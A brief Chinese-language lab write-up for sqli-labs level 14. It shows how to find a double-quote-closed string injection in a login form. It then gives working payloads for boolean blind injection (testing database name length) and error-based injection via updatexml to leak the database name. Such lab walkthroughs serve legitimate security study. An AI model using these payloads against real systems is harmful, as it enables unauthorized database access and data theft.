sqli-labs (less-14)
进入14关,输入账号和密码,登入后发现也没有数据返回
uname=admin'&passwd=admin&submit=Submit #无错误显示
uname=admin"&passwd=admin&submit=Submit #有完整错误显示
根据输入"显示的错误信息判断闭合方式为"#,并且为字符型注入
使用Boolean盲注
查看当前数据库长度
uname=a" or length(database())=8#&passwd=admin&submit=Submit
剩下的在这里不一一介绍,具体过程请看我的less-13
使用报错注入
查看当前数据库
uname=a" or updatexml(1,concat(0x7e,(database()),0x7e),1)#&passwd=admin&submit=Submit
剩下的在这里不一一介绍,具体过程请看我的less-13